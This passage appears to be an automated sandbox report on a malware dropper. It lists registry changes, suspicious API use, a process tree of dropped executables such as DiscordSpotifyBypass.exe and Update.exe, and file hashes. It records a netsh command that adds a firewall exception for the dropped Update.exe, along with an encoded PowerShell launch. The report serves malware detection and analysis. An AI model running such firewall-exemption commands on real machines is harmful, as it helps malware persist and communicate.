| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\InstallerPinned = "0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\heo.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping [...]-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjMiIGluc3RhbGxkYXRldGltZT0iMTczOTE4NDcxMiIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNjU1NjY2MDQzMDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUwMTUxMzcwNDMiLz48L2FwcD48L3JlcXVlc3Q-
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe
"C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc [...]
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe
"C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe
"C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Users\Admin\AppData\Local\Temp\Files\aaa%20(3).exe
"C:\Users\Admin\AppData\Local\Temp\Files\aaa%20(3).exe"
C:\Users\Admin\AppData\Local\Temp\Files\Update.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Update.exe"
C:\Users\Admin\AppData\Roaming\Update.exe
"C:\Users\Admin\AppData\Roaming\Update.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Update.exe" "Update.exe" ENABLE
C:\Users\Admin\AppData\Local\Temp\Files\aaa%20(3).exe
"C:\Users\Admin\AppData\Local\Temp\Files\aaa%20(3).exe"
C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe
"C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe"
C:\Users\Admin\AppData\Local\Temp\Files\heo.exe
"C:\Users\Admin\AppData\Local\Temp\Files\heo.exe"
C:\Users\Admin\AppData\Local\Temp\Files\heo.exe
"C:\Users\Admin\AppData\Local\Temp\Files\heo.exe"
C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe
"C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\MicrosoftEdge_X64_133.0.3065.59.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff772eb6a68,0x7ff772eb6a74,0x7ff772eb6a80
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff772eb6a68,0x7ff772eb6a74,0x7ff772eb6a80
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --register-package-identity --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --remove-deprecated-packages --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6fc4e6a68,0x7ff6fc4e6a74,0x7ff6fc4e6a80
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --update-game-assist-package --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6fc4e6a68,0x7ff6fc4e6a74,0x7ff6fc4e6a80
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6fc4e6a68,0x7ff6fc4e6a74,0x7ff6fc4e6a80
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{61A04984-23EA-4E4E-BD59-4D8A0896B915}\MicrosoftEdge_X64_133.0.3065.59_132.0.2957.140.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{61A04984-23EA-4E4E-BD59-4D8A0896B915}\MicrosoftEdge_X64_133.0.3065.59_132.0.2957.140.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{61A04984-23EA-4E4E-BD59-4D8A0896B915}\EDGEMITMP_D472E.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{61A04984-23EA-4E4E-BD59-4D8A0896B915}\EDGEMITMP_D472E.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{61A04984-23EA-4E4E-BD59-4D8A0896B915}\MicrosoftEdge_X64_133.0.3065.59_132.0.2957.140.exe" --previous-version="132.0.2957.140" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{61A04984-23EA-4E4E-BD59-4D8A0896B915}\EDGEMITMP_D472E.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{61A04984-23EA-4E4E-BD59-4D8A0896B915}\EDGEMITMP_D472E.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{61A04984-23EA-4E4E-BD59-4D8A0896B915}\EDGEMITMP_D472E.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff63a5b6a68,0x7ff63a5b6a74,0x7ff63a5b6a80
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping
C:\Users\Admin\AppData\Local\Temp\Files\heo.exe
"C:\Users\Admin\AppData\Local\Temp\Files\heo.exe"
C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe
"C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe"
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe
"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5956 -ip 5956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5956 -s 448
Network
Files
| MD5 | 272c0f80fd132e434cdcdd4e184bb1d8 |
| SHA1 | 5bc8b7260e690b4d4039fe27b48b2cecec39652f |
| SHA256 | bd943767f3e0568e19fb52522217c22b6627b66a3b71cd38dd6653b50662f39d |
| SHA512 | 94892a934a92ef1630fbfea956d1fe3a3bfe687dec31092828960968cb321c4ab3af3caf191d4e28c8ca6b8927fbc1ec5d17d5c8a962c848f4373602ec982cd4 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-crt-math-l1-1-0.dll
| MD5 | b8f0210c47847fc6ec9fbe2a1ad4debb |
| SHA1 | e99d833ae730be1fedc826bf1569c26f30da0d17 |
| SHA256 | 1c4a70a73096b64b536be8132ed402bcfb182c01b8a451bff452efe36ddf76e7 |
| SHA512 | 992d790e18ac7ae33958f53d458d15bff522a3c11a6bd7ee2f784ac16399de8b9f0a7ee896d9f2c96d1e2c8829b2f35ff11fc5d8d1b14c77e22d859a1387797c |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-crt-locale-l1-1-0.dll
| MD5 | 650435e39d38160abc3973514d6c6640 |
| SHA1 | 9a5591c29e4d91eaa0f12ad603af05bb49708a2d |
| SHA256 | 551a34c400522957063a2d71fa5aba1cd78cc4f61f0ace1cd42cc72118c500c0 |
| SHA512 | 7b4a8f86d583562956593d27b7ecb695cb24ab7192a94361f994fadba7a488375217755e7ed5071de1d0960f60f255aa305e9dd477c38b7bb70ac545082c9d5e |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-crt-heap-l1-1-0.dll
| MD5 | d5d77669bd8d382ec474be0608afd03f |
| SHA1 | 1558f5a0f5facc79d3957ff1e72a608766e11a64 |
| SHA256 | 8dd9218998b4c4c9e8d8b0f8b9611d49419b3c80daa2f437cbf15bcfd4c0b3b8 |
| SHA512 | 8defa71772105fd9128a669f6ff19b6fe47745a0305beb9a8cadb672ed087077f7538cd56e39329f7daa37797a96469eae7cd5e4cca57c9a183b35bdc44182f3 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-crt-filesystem-l1-1-0.dll
| MD5 | 5107487b726bdcc7b9f7e4c2ff7f907c |
| SHA1 | ebc46221d3c81a409fab9815c4215ad5da62449c |
| SHA256 | 94a86e28e829276974e01f8a15787fde6ed699c8b9dc26f16a51765c86c3eade |
| SHA512 | a0009b80ad6a928580f2b476c1bdf4352b0611bb3a180418f2a42cfa7a03b9f0575ed75ec855d30b26e0cca96a6da8affb54862b6b9aff33710d2f3129283faa |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-crt-environment-l1-1-0.dll
| MD5 | f9235935dd3ba2aa66d3aa3412accfbf |
| SHA1 | 281e548b526411bcb3813eb98462f48ffaf4b3eb |
| SHA256 | 2f6bd6c235e044755d5707bd560a6afc0ba712437530f76d11079d67c0cf3200 |
| SHA512 | ad0c0a7891fb8328f6f0cf1ddc97523a317d727c15d15498afa53c07610210d2610db4bc9bd25958d47adc1af829ad4d7cf8aabcab3625c783177ccdb7714246 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-crt-convert-l1-1-0.dll
| MD5 | edf71c5c232f5f6ef3849450f2100b54 |
| SHA1 | ed46da7d59811b566dd438fa1d09c20f5dc493ce |
| SHA256 | b987ab40cdd950ebe7a9a9176b80b8fffc005ccd370bb1cbbcad078c1a506bdc |
| SHA512 | 481a3c8dc5bef793ee78ce85ec0f193e3e9f6cd57868b813965b312bd0fadeb5f4419707cd3004fbdb407652101d52e061ef84317e8bd458979443e9f8e4079a |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-crt-conio-l1-1-0.dll
| MD5 | d4fba5a92d68916ec17104e09d1d9d12 |
| SHA1 | 247dbc625b72ffb0bf546b17fb4de10cad38d495 |
| SHA256 | 93619259328a264287aee7c5b88f7f0ee32425d7323ce5dc5a2ef4fe3bed90d5 |
| SHA512 | d5a535f881c09f37e0adf3b58d41e123f527d081a1ebecd9a927664582ae268341771728dc967c30908e502b49f6f853eeaebb56580b947a629edc6bce2340d8 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-util-l1-1-0.dll
| MD5 | 0f129611a4f1e7752f3671c9aa6ea736 |
| SHA1 | 40c07a94045b17dae8a02c1d2b49301fad231152 |
| SHA256 | 2e1f090aba941b9d2d503e4cd735c958df7bb68f1e9bdc3f47692e1571aaac2f |
| SHA512 | 6abc0f4878bb302713755a188f662c6fe162ea6267e5e1c497c9ba9fddbdaea4db050e322cb1c77d6638ecf1dad940b9ebc92c43acaa594040ee58d313cbcfae |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | d12403ee11359259ba2b0706e5e5111c |
| SHA1 | 03cc7827a30fd1dee38665c0cc993b4b533ac138 |
| SHA256 | f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781 |
| SHA512 | 9004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-sysinfo-l1-1-0.dll
| MD5 | fd46c3f6361e79b8616f56b22d935a53 |
| SHA1 | 107f488ad966633579d8ec5eb1919541f07532ce |
| SHA256 | 0dc92e8830bc84337dcae19ef03a84ef5279cf7d4fdc2442c1bc25320369f9df |
| SHA512 | 3360b2e2a25d545ccd969f305c4668c6cda443bbdbd8a8356ffe9fbc2f70d90cf4540f2f28c9ed3eea6c9074f94e69746e7705e6254827e6a4f158a75d81065b |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-synch-l1-2-0.dll
| MD5 | 1281e9d1750431d2fe3b480a8175d45c |
| SHA1 | bc982d1c750b88dcb4410739e057a86ff02d07ef |
| SHA256 | 433bd8ddc4f79aee65ca94a54286d75e7d92b019853a883e51c2b938d2469baa |
| SHA512 | a954e6ce76f1375a8beac51d751b575bbc0b0b8ba6aa793402b26404e45718165199c2c00ccbcba3783c16bdd96f0b2c17addcc619c39c8031becebef428ce77 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-synch-l1-1-0.dll
| MD5 | 225d9f80f669ce452ca35e47af94893f |
| SHA1 | 37bd0ffc8e820247bd4db1c36c3b9f9f686bbd50 |
| SHA256 | 61c0ebe60ce6ebabcb927ddff837a9bf17e14cd4b4c762ab709e630576ec7232 |
| SHA512 | 2f71a3471a9868f4d026c01e4258aff7192872590f5e5c66aabd3c088644d28629ba8835f3a4a23825631004b1afd440efe7161bb9fc7d7c69e0ee204813ca7b |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-string-l1-1-0.dll
| MD5 | 2666581584ba60d48716420a6080abda |
| SHA1 | c103f0ea32ebbc50f4c494bce7595f2b721cb5ad |
| SHA256 | 27e9d3e7c8756e4512932d674a738bf4c2969f834d65b2b79c342a22f662f328 |
| SHA512 | befed15f11a0550d2859094cc15526b791dadea12c2e7ceb35916983fb7a100d89d638fb1704975464302fae1e1a37f36e01e4bef5bc4924ab8f3fd41e60bd0c |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-rtlsupport-l1-1-0.dll
| MD5 | a0c2dbe0f5e18d1add0d1ba22580893b |
| SHA1 | 29624df37151905467a223486500ed75617a1dfd |
| SHA256 | 3c29730df2b28985a30d9c82092a1faa0ceb7ffc1bd857d1ef6324cf5524802f |
| SHA512 | 3e627f111196009380d1687e024e6ffb1c0dcf4dcb27f8940f17fec7efdd8152ff365b43cb7fdb31de300955d6c15e40a2c8fb6650a91706d7ea1c5d89319b12 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-profile-l1-1-0.dll
| MD5 | f3ff2d544f5cd9e66bfb8d170b661673 |
| SHA1 | 9e18107cfcd89f1bbb7fdaf65234c1dc8e614add |
| SHA256 | e1c5d8984a674925fa4afbfe58228be5323fe5123abcd17ec4160295875a625f |
| SHA512 | 184b09c77d079127580ef80eb34bded0f5e874cefbe1c5f851d86861e38967b995d859e8491fcc87508930dc06c6bbf02b649b3b489a1b138c51a7d4b4e7aaad |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | 517eb9e2cb671ae49f99173d7f7ce43f |
| SHA1 | 4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab |
| SHA256 | 57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54 |
| SHA512 | 492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be |
